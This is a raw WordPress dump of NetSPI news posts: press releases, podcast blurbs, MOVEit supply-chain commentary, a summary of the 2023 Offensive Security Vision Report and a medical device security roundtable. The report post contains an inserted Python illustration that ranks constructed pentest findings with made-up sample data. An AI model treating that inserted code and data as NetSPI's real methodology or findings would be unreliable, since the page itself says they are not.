Live on-location from Infosecurity Europe 2023, Sean Martin connects with Nabil Hannan, the field CISO at NetSPI, to discuss Attack Surface Management (ASM) and how it has evolved in recent years to become the minimum cybersecurity benchmark that organizations need. ASM provides a more targeted approach to vulnerability management, allowing testers to focus on building a platform with automation that identifies areas that need attention and validates them.
Sean and Nabil also cover API security, the challenges of authentication and authorization, and the need for organizations to prioritize building secure-by-design frameworks. Nabil stresses the importance of understanding an organization's external perimeter and what exposures might exist, as well as the need for good cybersecurity hygiene that starts with good cybersecurity basics before bringing others in to help with the problem.
ASM is an important element of modern cybersecurity; its role as the first line of defense reinforces the critical need to have a continuous view of an organization's external-facing perimeter.
Listen to the full podcast episode below or online here.
[post_title] => ITSP Magazine: Building A Better Defense With Attack Surface Management | A Company Briefing From Infosecurity Europe 2023
[post_excerpt] => During Infosecurity Europe 2023, NetSPI Field CISO Nabil Hannan caught up with Sean Martin of ITSP Magazine to discuss API security, attack surface management, and more.
[post_modified] => 2023-06-22 16:17:54
[guid] => https://www.netspi.com/?p=30404
)
[19] => WP_Post Object
(
[ID] => 30396
[post_date] => 2023-06-20 09:00:00
[post_content] =>
On this episode of the 8th Layer Insights podcast, Perry sits down with Chad Peterson, Managing Director at NetSPI, to discuss the importance of penetration testing. We touch on aspects of social engineering, discussing complex security issues with Boards of Directors, the prevalence of ransomware, and some of the unique challenges facing the healthcare industry.
Listen to the full podcast episode below or online here.
[post_title] => 8th Layer Insights [Ep 34]: Something Wicked This Way Comes: Pentesting Your Environment w/Chad Peterson of NetSPI
[post_excerpt] => On this episode of the 8th Layer Insights podcast, Perry sits down with Chad Peterson, Managing Director at NetSPI, to discuss the importance of penetration testing.
[post_modified] => 2023-06-22 16:16:41
[guid] => https://www.netspi.com/?p=30396
)
[20] => WP_Post Object
(
[ID] => 30357
[post_date] => 2023-06-16 09:57:59
[post_content] =>
Minneapolis, MN – June 16, 2023 — NetSPI, the global leader in offensive security, has been named one of the Top 200 Workplaces in Minnesota by the Star Tribune. The company was selected as one of the best places to work in the state for a third consecutive year, based on an employee survey measuring engagement, organizational health, and satisfaction.
NetSPI ranks #12 on the midsize companies list, and was honored for its cultural excellence, with special recognition for its innovation, employee appreciation, work-life flexibility, compensation and benefits, leadership, and purpose and values. These recognitions exemplify NetSPI’s values and are a core driver for its continuous growth and positive impact on the cybersecurity industry.
“Our workplace culture is the foundation of our success. Recognition like this is a great reminder of how special the people at NetSPI are,” said Heather Crosley, VP of People Operations. “It’s no easy feat to maintain a strong culture while experiencing exponential growth. I’m proud of this team for maintaining a positive environment of innovation and collaboration not only in Minnesota, but across our global offices.”
NetSPI is on a growth trajectory, most recently achieving 58 percent organic revenue growth in 2022. This advancement continues to be driven by an emphasis on evolving its powerful offensive security platforms for its Pentesting as a Service, Attack Surface Management, and Breach and Attack Simulation solutions, global expansion in the EMEA region, and a customer-first approach to cybersecurity. Last year, the company hired more than 230 employees and promoted over 170 staff members. In 2023 to date, NetSPI has welcomed 136 employees to the team to support the delivery and development of its award-winning offensive security solutions.
“The companies in the Star Tribune Top 200 Workplaces deserve high praise for creating the very best work environments in the state of Minnesota,” said Star Tribune CEO and Publisher Steve Grove. “My congratulations to each of these exceptional companies.”
A complete list is available at www.startribune.com/mn-top-workplaces and will also be published in the Star Tribune Top Workplaces special section on Sunday, June 18.
For a glimpse of what it’s like to work at NetSPI read the blog post recap of the company’s Employee Kickoff event, written by CEO Aaron Shilts. Visit www.netspi.com/careers to explore open job opportunities.
https://www.youtube.com/watch?v=plEQPZzXJEs
About NetSPI
NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. Through a combination of technology innovation and human ingenuity, NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. Its global cybersecurity experts are committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India.
[post_title] => NetSPI Named a 2023 Top 200 Workplace in Minnesota, Honored for Cultural Excellence
[post_excerpt] => NetSPI was selected for Star Tribune’s Top 200 Workplaces in Minnesota list. Read why NetSPI is one of the best companies to work for in MN!
[post_modified] => 2023-06-16 09:58:00
[guid] => https://www.netspi.com/?p=30357
)
[21] => WP_Post Object
(
[ID] => 30401
[post_date] => 2023-06-16 09:00:00
[post_content] =>
In this episode of the Evo Cyber Security podcast, host James Price dives into the fascinating world of penetration testing, exploring the art and science of hacking your own applications. Joining him are esteemed guests Ron Kuriscak, Managing Director at NetSPI; Derek Fisher, Head of Product Security at Envestnet, Inc.; and Abhishek Ramchandran, Penetration Testing Team Lead at Siemens.
Together, they share their expertise and insights, shedding light on the critical importance of proactive security measures in an increasingly interconnected digital landscape. Don’t miss this enlightening discussion with top industry professionals.
Listen to the full podcast episode below or online here.
Putting the developer in the driver’s seat is the primary premise of DevSecOps. Empower the developer with automation, tools, information, training — and wonders happen. Now, ‘the developer’ here is, of course, part of a team and you’ll need to make sure that you equip the team with the right skills, which means development, testing, security, and operational skills.
These teams then go on their journey to develop your next generation product. This undoubtedly will include more communication from more sources compared to your current generation product. This will also include more open-source components and libraries compared to your previous generation. That is simply how the world moves nowadays: users are expecting more capabilities, more integration, more slick user interfaces, single sign-on, and on and on.
This will stretch the capabilities of your team; the inclusion of more technology will make it hard for them to truly be an expert in everything. The push for more capabilities, in a shorter timeframe, typically with reduced headcount, makes it inevitable that corners will be cut. This is where problems can slip into your code, or worse, into your design. These can easily lead to security vulnerabilities that can be costly down the road.
This is a blind spot that DevSecOps does not cover. Let’s assume that you have the best DevSecOps workflows and pipelines that money can establish. Your team raves about their developer journey. They can work from their integrated development environment (IDE). They write test cases for all functionalities. They perform deep Static Application Security Testing (SAST) using GrammaTech CodeSonar. Their merge requests are automatically rejected unless all tests pass.
The blind spot is typically that nobody sits down and thinks “how can I break this stack of technology” from the adversarial perspective. And this is exactly where the partnership between GrammaTech and NetSPI comes in.
NetSPI provides an adversarial view and enhances the capabilities of teams with a ‘what if’ perspective. NetSPI reviews designs with the experience of what can go wrong as part of a Secure Code Review service. This looks at design and code in a way that automated tools cannot. Security experts review your team's usage of SAST and their assessments and see what is overlooked. On top of that, the security experts at NetSPI can also help your team in triaging SAST warnings, so they do not have to. This is useful, for example, if you are adding larger bodies of code to existing projects.
Lastly, and this may be the most important of all, NetSPI can help your team become better with secure coding and remediation training. Based on what NetSPI’s team of offensive security specialists sees, they can use your code to provide recommendations on how to improve the capabilities of a team.
What you end up with is a stronger product, and a stronger, more experienced team. Partnerships like this result in shared strength across teams. Explore GrammaTech or NetSPI’s Partnership options for more.
NetSPI EMEA Senior Security Consultant Tyler Sullivan shares supply chain security insights surrounding the MOVEit CVE with CyberWire Pro. Read a snippet below, or find the full article at https://thecyberwire.com/newsletters/privacy-briefing/5/115.
+++
Speaking of the MOVEit bug, US research institution and medical center the Johns Hopkins University has disclosed it suffered a cyberattack connected to the vulnerability. A notification letter sent to the university community states that the incident "may have impacted the information of Johns Hopkins employees, students and/or patients." Officials say an investigation is ongoing, and that it does not appear that electronic health records were impacted. Cybersecurity expert Bill Sieglein told WBAL 11 News, "This was called a 'zero-day attack,' meaning the attackers, who are out of Russia, a group known as CLOP, they discovered a vulnerability in this piece of software called MOVEit. MOVEit is a piece of software that allows you to move large data files between networks and between systems. They found a vulnerability before anybody knew about it and, all at once, launched an attack worldwide.”
Tyler Sullivan, Senior Security Consultant at NetSPI, commented on the implications of this instance of MOVEit exploitation for software supply chain security. “Following the recently disclosed, widely exploited vulnerability in the MOVEit file transfer product, multiple organizations have disclosed they’ve been affected despite not being first-hand users of the technology -- due to the complex software supply chain ecosystem," Sullivan wrote. "To slow third-party software vendor-based attacks, a paradigm shift is required, from standard perimeter-based networks to a Zero Trust architecture. Additionally, it’s critical for organizations to minimize the attack surface and reliance on the supply chain - this means decreasing the amount of third parties used and regularly auditing them for any security gaps. There is not a single responsible party for the supply chain, it's down to the vendors, the repositories, the software consumers and the developers. The second half of 2023 should be when we see meaningful progress by all parties involved to control the supply chain and ensure it can be used in a secure way.”
While the Russian hackers were the first to exploit the vulnerability, experts warn that other groups might now possess the necessary software code to conduct similar attacks. The CLOP group had initially set a deadline for victims to contact them regarding ransom payments. Afterward, they began listing additional alleged victims on their dark web extortion site. However, as of the latest update, no US federal agencies were listed. The hackers even reassured government entities by stating that they had erased all their data and had no intention of exposing such information.
The CLOP ransomware group is part of a larger collection of gangs primarily based in Eastern Europe and Russia, notorious for their focus on extracting significant sums of money from their victims.
This latest cyberattack highlights the extensive impact that a single software vulnerability can have when exploited by skilled criminals. The hackers, a well-known group that emerged in 2019, began exploiting a new flaw in MOVEit, a widely used file-transfer software, in late May. Their approach appeared opportunistic, targeting as many vulnerable organizations as possible and leaving them susceptible to extortion.
Progress, the US company that owns MOVEit software, has advised victims to update their software packages and has issued security recommendations to mitigate the risks.
Tyler Sullivan, Senior Security Consultant, NetSPI provided insights on how a shift in security strategy implementation could help thwart this type of threat in the future:
"To slow third-party software vendor-based attacks, a paradigm shift is required, from standard perimeter-based networks to a Zero Trust architecture. Additionally, it’s critical for organizations to minimize the attack surface and reliance on the supply chain - this means decreasing the amount of third parties used and regularly auditing them for any security gaps.
There is not a single responsible party for the supply chain, it's down to the vendors, the repositories, the software consumers and the developers. The second half of 2023 should be when we see meaningful progress by all parties involved to control the supply chain and ensure it can be used in a secure way.”
Following record growth and international expansion, offensive security leader to present attack surface insights at Europe’s largest security event.
Minneapolis, MN and London – 20 June, 2023 – NetSPI, the global leader in offensive security, will be exhibiting and speaking at Infosecurity Europe 2023, Europe’s largest cybersecurity event taking place from 20-22 June at ExCeL London. NetSPI is located at stand #T55 on the show floor.
Following a year of record growth and international expansion across Europe, Middle East, and Africa (EMEA), NetSPI will be on-site to demo its comprehensive suite of continuous and scalable offensive security solutions, which include Penetration Testing as a Service, Attack Surface Management, and Breach and Attack Simulation. NetSPI’s customer-centric focus, combined with its offensive security expertise, enables the company to meet increasing international demand for its offering in the region.
Additionally, on 20 June, from 3:45-4:15 PM BST, Sam Kirkman, EMEA Services Director at NetSPI, will present at the Talking Tactics Theatre in a session titled: “Testing the Untested.” In this talk, Sam will discuss how security leaders can make a meaningful difference in their security programs by understanding some of the less-tested areas of the attack surface, how to better gain risk visibility, and the most effective security controls based on insight from trained hackers.
To participate in a live demo, or to book a 1:1 meeting with an expert, please click here. To learn more about how NetSPI’s offensive security can help your organisation, please visit www.netspi.com.
Infosecurity Europe attendees can also join NetSPI, alongside Semperis, on 20 June from 5-8 PM BST at the Fox Connaught, on Lynx Way in London, for a complimentary happy hour. Please register for the event here.
About NetSPI
NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. Through a combination of technology innovation and human ingenuity, NetSPI helps organisations discover, prioritise, and remediate security vulnerabilities. Its global cybersecurity experts are committed to securing the world’s most prominent organisations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India.
[post_title] => NetSPI at Infosecurity Europe 2023
[post_excerpt] => Learn where to find NetSPI at Infosecurity Europe 2023 in London. Schedule a meeting and meet the team at stand #T55!
[post_name] => infosecurity-europe-2023
[post_modified] => 2023-06-13 08:49:41
[post_modified_gmt] => 2023-06-13 13:49:41
[guid] => https://www.netspi.com/?p=30330
)
[26] => WP_Post Object
(
[ID] => 30383
[post_author] => 91
[post_date] => 2023-06-12 09:00:00
[post_date_gmt] => 2023-06-12 14:00:00
[post_content] =>
NetSPI Head of Product Cody Chamberlain joins Techstrong.tv's Mitch Ashley for a conversation on the 2023 Offensive Security Vision Report. Listen to the full interview.
+++
Cody Chamberlain, NetSPI head of product, shares highlights from NetSPI’s recently released 2023 Offensive Security Vision Report based on over 300,000 anonymized findings from more than 240,000 hours of penetration testing. The report identifies the 30 most prevalent vulnerabilities across various industries. Download the free report at netspi.com/resources/reports/offensive-security-vision-report-2023/
In its inaugural 2023 Offensive Security Vision Report, NetSPI unveils findings that highlight vulnerability trends across applications, cloud, and networks.
Vulnerability patterns
The report offers a look back — and forward — at some of the most significant vulnerability patterns of the past year to help security and business leaders focus discovery, management, and remediation efforts on the riskiest vulnerabilities most likely to exist on their attack surface.
According to the NIST National Vulnerability Database, the number of published vulnerabilities has increased steadily year over year for the past five years and shows no signs of slowing down. This, coupled with the reality of burnt-out security and development teams, creates an imminent need for prioritization.
The report analyzed over 300,000 anonymized findings from thousands of pentest engagements, spanning more than 240,000 hours of testing, to identify the most prevalent vulnerabilities across various industries — which include healthcare, retail, finance, and manufacturing.
Today, offensive security is only as valuable as its ability to help you prioritize remediation of the issues that matter most to your business.
[post_title] => Help Net Security: Fresh perspectives needed to manage growing vulnerabilities
[post_excerpt] => NetSPI's 2023 Offensive Security Vision Report was featured in Help Net Security. Read the preview below or view the article online.
[post_name] => helpnet-vision-report
[post_modified] => 2023-05-31 16:20:54
[post_modified_gmt] => 2023-05-31 21:20:54
[guid] => https://www.netspi.com/?p=30277
)
[28] => WP_Post Object
(
[ID] => 30175
[post_author] => 91
[post_date] => 2023-05-23 07:30:00
[post_date_gmt] => 2023-05-23 12:30:00
[post_content] =>
Survey finds lack of resources and prioritization as the greatest barriers to timely vulnerability remediation.
Minneapolis, Minnesota – NetSPI, the global leader in offensive security, today announced the findings from its inaugural 2023 Offensive Security Vision Report, focusing on vulnerability trends across applications, cloud, and networks. The report offers a look back — and forward — at some of the most significant vulnerability patterns of the past year to help security and business leaders focus discovery, management, and remediation efforts on the riskiest vulnerabilities most likely to exist on their attack surface.
The report analyzed over 300,000 anonymized findings from thousands of pentest engagements, spanning more than 240,000 hours of testing, to identify the most prevalent vulnerabilities across various industries — which include healthcare, retail, finance, and manufacturing.
Top findings include:
On average, the highest volume of critical and high severity vulnerabilities was discovered within the government and nonprofit industry. By contrast, insurance had the lowest volume of critical and high severity vulnerabilities.
Internal networks have 3x more exploitable vulnerabilities than external networks.
Of the applications tested, web applications have a higher prevalence of high and critical vulnerabilities compared to mobile and thick applications.
The two greatest barriers to timely and effective remediation today are a lack of resources (70%) and prioritization (60%).
71% of respondents shared that less than one-fourth of security roles budgeted were entry-level, with 46% of those reporting no plans for entry-level hiring in 2023.
“One narrative made evident from our Offensive Security Vision Report is that vulnerability prioritization is critical,” said Vinay Anand, Chief Product Officer at NetSPI. “The reality is that we cannot fix every vulnerability discovered, but if prioritization and support continue to lack, the security industry will fall short. This realization, coupled with the industry experiencing rising burnout rates among developer teams, should evoke a sense of urgency. Our findings can help leaders grasp the severity of the situation to prioritize vulnerability management.”
“This report makes it abundantly clear that there’s still a lot to be done to support and enable the industry to improve vulnerability management,” said Cody Chamberlain, Head of Product at NetSPI. “We hope the observations and actionable recommendations throughout our inaugural Offensive Security Vision Report are a great data-driven starting point for security teams to harden their security.”
The 2023 Offensive Security Vision Report is available to download now. For more information about NetSPI, visit www.netspi.com.
[post_title] => NetSPI Unveils 2023 Offensive Security Vision Report, Shines Light on the Need for Improved Vulnerability Prioritization
[post_excerpt] => In its inaugural Vision Report, NetSPI uncovers vulnerability trends across applications, cloud, and networks and shines a light on the need for improved vulnerability prioritization. Get the report now!
[post_name] => offensive-security-vision-report-2023
[post_modified] => 2023-05-22 16:04:23
[post_modified_gmt] => 2023-05-22 21:04:23
[guid] => https://www.netspi.com/?p=30175
)
[29] => WP_Post Object
(
[ID] => 30116
[post_author] => 91
[post_date] => 2023-05-08 09:00:00
[post_date_gmt] => 2023-05-08 14:00:00
[post_content] =>
MINNEAPOLIS — NetSPI, the offensive security leader, announced today that CRN®, a brand of The Channel Company, has named Lauren Gimmillaro, Vice President of Business Development & Strategic Alliances, to the 2023 Women of the Channel list. Every year, CRN recognizes women from vendor, distributor, and solution provider organizations whose expertise and vision are leaving a noticeable and commendable mark on the technology industry.
“We are ecstatic to announce this year’s honorees and shine a light on these women for their significant achievements, knowing that what they’ve accomplished has paved the way for continued success within the IT channel,” said Blaine Raddon, CEO of The Channel Company. “The channel is stronger because of them, and we look forward to seeing what they do next.”
Lauren Gimmillaro has a track record of launching four successful partner programs, working with channel, referral, reseller, and technology partners. In August 2022, Gimmillaro led the launch of NetSPI Partner Program, which empowers its global channel and technology partners to deliver offensive security services at a time when it’s needed most – a program that drove a 70 percent increase in YoY channel revenue. Gimmillaro now leads the NetSPI Partner Program to continue building strategic relationships between NetSPI and its partners.
“I’m honored to be recognized among this incredible list of female channel leaders. Partners play a vital role in NetSPI’s growth and expansion plans for the future,” said Gimmillaro. “It’s critical to provide end users with the tools, services, and skill sets they need to take an offensive approach to security. As we continue to grow our partner program, we’ll be looking at a variety of different partners, including MSP/MSSPs, VARs, vCISOs, to collectively help organizations across the globe improve security.”
The CRN 2023 Women of the Channel honorees bring their creativity, strategic thinking and leadership to bear in a variety of roles and responsibilities, but all are turning their unique talents toward driving success for their partners and customers. With this recognition, CRN honors these women for their unwavering dedication and commitment to furthering channel excellence.
The 2023 Women of the Channel list will be featured in the June issue of CRN Magazine, with online coverage starting May 8 at www.CRN.com/WOTC.
About The Channel Company
The Channel Company enables breakthrough IT channel performance with our dominant media, engaging events, expert consulting and education, and innovative marketing services and platforms. As the channel catalyst, we connect and empower technology suppliers, solution providers, and end-users. Backed by more than 30 years of unequaled channel experience, we draw from our deep knowledge to envision innovative solutions for ever-evolving challenges in the technology marketplace. www.thechannelcompany.com
[post_title] => CRN’s 2023 Women of the Channel Honors NetSPI’s Lauren Gimmillaro
[post_excerpt] => Lauren Gimmillaro, VP of Business Development & Strategic Alliances, has been recognized on CRN's 2023 Women of the Channel list. Read the announcement and learn about her work with the NetSPI Partner Program.
[post_name] => lauren-gimmillaro-2023-women-of-the-channel-crn
[post_modified] => 2023-05-08 08:48:08
[post_modified_gmt] => 2023-05-08 13:48:08
[guid] => https://www.netspi.com/?p=30116
)
[30] => WP_Post Object
(
[ID] => 30087
[post_author] => 91
[post_date] => 2023-05-04 10:46:38
[post_date_gmt] => 2023-05-04 15:46:38
[post_content] =>
Security Weekly interviewed NetSPI Chief Product Officer Vinay Anand live at RSAC 2023. The discussion centered on the evolution of the external attack surface management (EASM) market.
+++
Tune in for a conversation on:
Why EASM is a critical component of continuous threat exposure management (CTEM)
How to use EASM to improve validation and vulnerability management processes.
[post_title] => Security Weekly: The Evolution of External Attack Surface Management (EASM)
[post_excerpt] => Listen to our Security Weekly interview on the evolution of the external attack surface management (EASM) market - live from RSAC 2023.
[post_name] => security-weekly-rsac-2023-easm
[post_modified] => 2023-05-05 08:53:38
[post_modified_gmt] => 2023-05-05 13:53:38
[guid] => https://www.netspi.com/?p=30087
)
[31] => WP_Post Object
(
[ID] => 30105
[post_author] => 91
[post_date] => 2023-05-03 14:29:02
[post_date_gmt] => 2023-05-03 19:29:02
[post_content] =>
In this video interview with Information Security Media Group at RSA Conference 2023, NetSPI Chief Product Officer Vinay Anand discusses:
The ever-expanding attack surface and its implications for offensive security;
NetSPI's mission to be the leader in offensive security by understanding a customer's exposure and adding knowledge of business context to determine the risk level of each asset;
The crucial importance of rapid response to offensive security.
[post_title] => ISMG: Empowering a Powerhouse of Offensive Security Solutions
[post_excerpt] => Listen to our ISMG interview on NetSPI's mission to be the leader in offensive security - live from RSAC 2023.
[post_name] => ismg-rsac-2023-offensive-security
[post_modified] => 2023-08-18 14:35:22
[post_modified_gmt] => 2023-08-18 19:35:22
[guid] => https://www.netspi.com/?p=30105
)
[32] => WP_Post Object
(
[ID] => 30042
[post_author] => 91
[post_date] => 2023-04-25 11:33:27
[post_date_gmt] => 2023-04-25 16:33:27
[post_content] =>
In cybersecurity, the discovery of assets and vulnerabilities is table stakes. What makes offensive security valuable today is its ability to prioritize remediation of issues that matter most to a business.
Modern security and development teams are inundated with challenges that demand their attention, leading to higher pressure in an already stressful role. What’s needed most is risk-based prioritization of vulnerabilities to help direct remediation efforts. NetSPI’s inaugural Offensive Security Vision Report delivers on this with data-backed prioritization of attack surfaces, vulnerabilities, and more.
We worked hard to uncover an anonymous, yet impactful way to share the trends we’ve seen during more than 240,000 hours of annual pentesting — and we can’t wait to share our insights with you!
Methodology
Our report is based on analysis of over 300,000 anonymized findings from thousands of 2022 pentest engagements. Here’s the approach we took:
We identified the top 30 most prevalent vulnerabilities from our six core focus areas or "attack surfaces" [web, mobile, and thick applications, cloud, and internal and external networks]. Additional criteria include:
Only medium, high, and critical severities were reported.
There were multiple instances of the finding across different company environments.
The findings were exploitable on multiple occasions.
Then we asked our in-house offensive security experts to manually identify 3-5 findings that security teams should prioritize based on likelihood and impact.
Lastly, we analyzed data for key trends across attack surface and industry.
The vulnerabilities within are ranked on likelihood and impact; we recommend that any business with these attack surfaces test for and remediate the security concerns highlighted in our Vision Report.
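As an added illustration (not NetSPI's analysis code or data), the following Python applies the three inclusion criteria above to a small constructed findings table, ranks what survives by prevalence, and then orders the shortlist by a likelihood x impact score standing in for the manual expert rating. The finding names, environments, exploitation flags and scores are all assumptions made for the example.

```python
"""Prioritisation filter over anonymised pentest findings.

Added example, not NetSPI's code or data. Applies the Vision Report's stated
inclusion criteria (severity medium or above, seen in multiple environments,
exploited on multiple occasions) to a constructed findings table, ranks the
survivors by prevalence, then orders the shortlist by likelihood x impact.
"""
from collections import defaultdict

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}

# Constructed sample data: one row per (engagement, finding) instance.
# Names, environments and flags are assumptions for illustration only.
SAMPLE_FINDINGS = [
    {"finding": "Excessive share permissions", "surface": "internal network",
     "severity": "high", "env": "org-A", "exploited": True},
    {"finding": "Excessive share permissions", "surface": "internal network",
     "severity": "high", "env": "org-B", "exploited": True},
    {"finding": "Excessive share permissions", "surface": "internal network",
     "severity": "medium", "env": "org-C", "exploited": False},
    {"finding": "SQL injection", "surface": "web application",
     "severity": "critical", "env": "org-A", "exploited": True},
    {"finding": "SQL injection", "surface": "web application",
     "severity": "critical", "env": "org-D", "exploited": True},
    {"finding": "Verbose server banner", "surface": "external network",
     "severity": "low", "env": "org-A", "exploited": False},       # below medium
    {"finding": "Verbose server banner", "surface": "external network",
     "severity": "low", "env": "org-B", "exploited": False},
    {"finding": "Kerberoastable service account", "surface": "internal network",
     "severity": "high", "env": "org-A", "exploited": True},        # one env only
    {"finding": "Outdated TLS config", "surface": "external network",
     "severity": "medium", "env": "org-A", "exploited": False},
    {"finding": "Outdated TLS config", "surface": "external network",
     "severity": "medium", "env": "org-B", "exploited": True},      # exploited once
]


def prevalent_findings(rows, top_n=30, min_envs=2, min_exploits=2):
    """Apply the three inclusion criteria and rank by prevalence.

    Returns [(finding, instance_count), ...], most prevalent first, capped
    at top_n (30 in the report). Ties break alphabetically so the order is
    deterministic.
    """
    instances = defaultdict(int)
    envs = defaultdict(set)
    exploits = defaultdict(int)
    for r in rows:
        if SEVERITY_RANK[r["severity"]] < SEVERITY_RANK["medium"]:
            continue                      # criterion 1: medium, high, critical only
        key = r["finding"]
        instances[key] += 1
        envs[key].add(r["env"])
        exploits[key] += int(r["exploited"])
    kept = [
        (f, n) for f, n in instances.items()
        if len(envs[f]) >= min_envs        # criterion 2: multiple environments
        and exploits[f] >= min_exploits    # criterion 3: exploited multiple times
    ]
    kept.sort(key=lambda fn: (-fn[1], fn[0]))
    return kept[:top_n]


def prioritize(rows, likelihood, impact):
    """Order the shortlist by likelihood x impact (1-5 each).

    The two maps stand in for the manual expert rating the report describes;
    every shortlisted finding must have an entry in both.
    Returns [(finding, score, instance_count), ...], highest score first.
    """
    shortlist = prevalent_findings(rows)
    scored = [(f, likelihood[f] * impact[f], n) for f, n in shortlist]
    scored.sort(key=lambda t: (-t[1], -t[2], t[0]))
    return scored


if __name__ == "__main__":
    # Constructed ratings: excessive permissions is very likely but slightly
    # less damaging than a critical SQL injection in this made-up environment.
    lik = {"Excessive share permissions": 5, "SQL injection": 3}
    imp = {"Excessive share permissions": 4, "SQL injection": 5}
    for finding, score, count in prioritize(SAMPLE_FINDINGS, lik, imp):
        print(f"score={score:>2}  instances={count:>2}  {finding}")
```

Two of the five constructed findings survive the filter: the low-severity banner is dropped by criterion 1, the single-environment Kerberoasting finding by criterion 2, and the once-exploited TLS finding by criterion 3. Loosening `min_exploits` to 1 brings the TLS finding back, which is the knob to turn if your own dataset is smaller than the report's.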
State of Remediation
We also surveyed several cybersecurity leaders from around the world to gauge the current state of remediation. A key narrative throughout our report, and made evident in our survey results, is that a lack of resources and prioritization are the two greatest barriers to timely and effective remediation. Yet, survey data showed security teams have limited plans for hiring in the coming year, especially when it comes to entry-level cybersecurity talent.
Even though security resources will remain tight, prioritization of effort is one area where security leaders can act now to separate competing priorities that would otherwise carry equal weight. Our report analyzed industries, attack surfaces, and vulnerabilities to distill the highest-risk areas for an organization to investigate and remediate.
Let’s start with industries.
Top 3 industries with the largest percentage of high & critical vulnerabilities:
Government & Non-profit
Healthcare
Education
Top 3 industries with the lowest percentage of high & critical vulnerabilities:
Energy & Utilities
Financial Services
Insurance
On average, the highest volume of critical and high severity vulnerabilities was found within the government and non-profit industries. On the other hand, insurance and financial services had the lowest volume of the same type of vulnerabilities. We found it interesting that two of the most highly regulated industries landed at opposite ends of the spectrum in this data.
We also asked survey respondents to share their average SLAs, or remediation due dates for the four severities. In the report, you’ll find data from your peers that can help you revise or benchmark your SLAs.
Vulnerabilities to Prioritize
Our report analyzed six core areas: web, mobile, and thick applications, cloud, and internal and external networks. As detailed in the methodology, our expert offensive security team manually evaluated the top findings for each and identified the 3-5 vulnerabilities whose discovery and remediation should be prioritized.
The complete list of all vulnerabilities we researched, alongside detailed remediation tips from our team, is in the full report.
During the analysis, we also examined overarching trends across the attack surfaces. Two major findings include:
Web applications have a higher prevalence of high and critical vulnerabilities compared to mobile and thick applications.
We also analyzed entry points, or vulnerabilities that were deemed exploitable, finding that internal networks have nearly three times more exploitable vulnerabilities than external networks.
Dig into the Data for Yourself
Remember, offensive security is only as valuable as its ability to help prioritize remediation of the issues that matter most to your business. Arm yourself and your team with the insights necessary to add prioritization to your remediation efforts.
Our Vision Report covers:
Impactful vulnerabilities that are most pervasive across core application, cloud, and network attack surfaces
Which attack surface presents the least/most risk
Industries that hold the lowest/highest risk
Today’s requirements for remediation due dates
The greatest barriers to timely and effective remediation
NetSPI hosted three cybersecurity professionals in the medical device industry for a roundtable discussion on their top learnings from implementing medical device security programs. I had the pleasure of moderating the session and was joined by:
Matt Russo, Senior Security Director, Medtronic
Dr. Matt Weir, Principal Cyber Security Researcher, MITRE
Curt Blythe, Director of Product Security, Abbott
The conversation covered core factors a medical device security program must have, the departmental structure of a security team within a medical device company, how they each approach medical device pentesting and vulnerability management, and much more.
Security for medical devices is complex as it continually evolves alongside product innovation. The best programs bring security into the product development lifecycle from the start, with the flexibility for enhancements as new trends emerge.
3 Factors of Successful Medical Device Security Programs
Panelists agreed on these three factors to give medical device security programs the best chance of success:
Executive buy-in. This is easier said than done, but dedicating effort to educating the team that influences business decisions will pay off greatly over time.
Integration into quality assurance. When talking about baking security into the product development lifecycle, this is one tangible way to do so. The clinical process for medical devices is well-established. Steps for security must be intentional and agreed-upon to create consistent protocols in medical device design.
Internal and external partnerships. Security is a business enabler because it reduces the risk of adverse events that could affect an organization. The more security is embedded into the medical device process, the more empowered a team becomes to move faster in a safe manner.
On the external partnerships side, many industry organizations have collected input and developed research to help organizations embrace security in medical devices. Leaning on these associations and the educational content they publish is akin to a cheat sheet for medical device security.
This list isn’t exhaustive, but it’s a grounding step toward creating a strong strategy for medical device security.
“We need to share information effectively across the ecosystem to make sure we're all using as much knowledge as we can to continue to be in a spot to secure very critical assets.”
Matt Russo, Senior Security Director, Medtronic
Lean on External Partners for Medical Device Cybersecurity Education
Our panelists mentioned several industry organizations and common frameworks they’ve created to help share collective knowledge across the industry. These organizations are a good place to start when designing a medical device security program:
Bring leadership along in this education journey! Matt Russo recommends monitoring what’s happening in your industry at the legislative level and relaying it back to the company to let your team know what’s coming. This helps show value early on to help influence team buy-in.
Are you keeping tabs on the recently passed omnibus bill? According to a report from Health IT Security, within its 4,000 pages, you’ll find “language that would require medical device manufacturers to ensure that their devices meet select cybersecurity requirements.” Listen to the panelists discuss the package, and more on medical device security compliance, starting at 23:55.
How Security Teams are Structured within Medical Device Departments
The structure of a security team within an organization depends on the size of the company. As companies grow, the size of security teams does too, resulting in more specialized roles within the department. Smaller medical device manufacturers, on the other hand, may have a single cybersecurity person on the team responsible for integrating security measures into the clinical process.
One commonality in both of these scenarios is that the security team is a centralized function that works with all individualized divisions. This avoids multiple people doing the same type of work and aids a consistent process organization-wide.
“When you can start actually trying to solve problems and get ahead of these issues, that's when you start being able to get that full buy-in to do more.”
Dr. Matt Weir, Principal Cyber Security Researcher, MITRE
If You Knew Then What You Know Now... What Would You Do Differently?
Experience is the best teacher. Panelists shared what they would do differently if they were starting over with a medical device security program.
Dr. Matt Weir: Understand that the clinical environment has a steep learning curve for people with traditional cybersecurity backgrounds.
Matt Russo: Push harder on internal education to equip non-technical leaders with the knowledge needed for buy-in. Move faster on best practices without needing legislation to drive the changes.
Curt Blythe: Build in a strategy from the start to update medical devices in the field as they transition from a single device to connected devices through IoT.
“As we're looking at the devices that are out in the field, how do we get updates to those? Is it a matter of sending a clinical engineer out there to update [it] holding a USB stick? Or can we do it over the air? Especially with the speed of security today, we need to be able to move faster. I think it becomes a speed and scale issue that we're going to have to work on.”
Curt Blythe, Director of Product Security, Abbott
Bookmark Now, Watch Later: Medical Device Security Webinar
